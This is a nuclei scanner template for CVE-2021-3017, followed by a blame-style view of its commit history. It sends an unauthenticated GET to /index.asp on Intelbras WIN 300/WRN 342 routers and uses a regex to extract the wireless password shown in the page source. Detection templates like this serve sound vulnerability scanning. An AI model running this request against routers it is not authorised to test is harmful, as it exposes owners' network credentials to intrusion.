nuclei-templates/cves/2021/CVE-2021-3017.yaml

id: CVE-2021-3017

info:
  name: Intelbras WIN 300/WRN 342 Disclosure
  author: pikpikcu
  severity: high
  description: The web interface on Intelbras WIN 300 and WRN 342 devices through 2021-01-04 allows remote attackers to discover credentials by reading the def_wirelesspassword line in the HTML source code.
  reference:
    - https://poc.wgpsec.org/PeiQi_Wiki/%E7%BD%91%E7%BB%9C%E8%AE%BE%E5%A4%87%E6%BC%8F%E6%B4%9E/Intelbras/Intelbras%20Wireless%20%E6%9C%AA%E6%8E%88%E6%9D%83%E4%B8%8E%E5%AF%86%E7%A0%81%E6%B3%84%E9%9C%B2%20CVE-2021-3017.html
    - https://nvd.nist.gov/vuln/detail/CVE-2021-3017
  tags: cve,cve2021,exposure,router
  classification:
    cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N
    cvss-score: 7.50
    cve-id: CVE-2021-3017

requests:
  - method: GET
    path:
      - "{{BaseURL}}/index.asp"

    matchers-condition: and
    matchers:
      - type: word
        words:
          - 'def_wirelesspassword ='
          - '<title>Roteador Wireless</title>'
        part: body
        condition: and

      - type: status
        status:
          - 200

    extractors:
      - type: regex
        part: body
        regex:
          - 'def_wirelesspassword = "([A-Za-z0-9=]+)";'
Create CVE-2021-3017.yaml 2021-08-14 06:32:59 +00:00			`id: CVE-2021-3017`

			`info:`
			`name: Intelbras WIN 300/WRN 342 Disclosure`
			`author: pikpikcu`
			`severity: high`
Update CVE-2021-3017.yaml 2021-08-14 08:26:56 +00:00			`description: The web interface on Intelbras WIN 300 and WRN 342 devices through 2021-01-04 allows remote attackers to discover credentials by reading the def_wirelesspassword line in the HTML source code.`
Removed pipe (\|) character from references, because the structure requires it to be a string slice, not a string Related nuclei tickets: * #259 - dynamic key-value field support for template information * #940 - new infos in template * #834 * RES-84 2021-08-19 13:59:12 +00:00			`reference:`
Update CVE-2021-3017.yaml 2021-08-14 08:28:04 +00:00			`- https://poc.wgpsec.org/PeiQi_Wiki/%E7%BD%91%E7%BB%9C%E8%AE%BE%E5%A4%87%E6%BC%8F%E6%B4%9E/Intelbras/Intelbras%20Wireless%20%E6%9C%AA%E6%8E%88%E6%9D%83%E4%B8%8E%E5%AF%86%E7%A0%81%E6%B3%84%E9%9C%B2%20CVE-2021-3017.html`
			`- https://nvd.nist.gov/vuln/detail/CVE-2021-3017`
			`tags: cve,cve2021,exposure,router`
Added cve annotations + severity adjustments 2021-09-10 11:26:40 +00:00			`classification:`
			`cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N`
			`cvss-score: 7.50`
			`cve-id: CVE-2021-3017`
Create CVE-2021-3017.yaml 2021-08-14 06:32:59 +00:00
			`requests:`
			`- method: GET`
			`path:`
			`- "{{BaseURL}}/index.asp"`

			`matchers-condition: and`
			`matchers:`
			`- type: word`
			`words:`
			`- 'def_wirelesspassword ='`
Update CVE-2021-3017.yaml 2021-08-14 08:26:56 +00:00			`- '<title>Roteador Wireless</title>'`
Create CVE-2021-3017.yaml 2021-08-14 06:32:59 +00:00			`part: body`
Update CVE-2021-3017.yaml 2021-08-14 08:33:43 +00:00			`condition: and`
Create CVE-2021-3017.yaml 2021-08-14 06:32:59 +00:00
			`- type: status`
			`status:`
			`- 200`
Update CVE-2021-3017.yaml 2021-08-14 08:26:56 +00:00
			`extractors:`
			`- type: regex`
			`part: body`
			`regex:`
			`- 'def_wirelesspassword = "([A-Za-z0-9=]+)";'`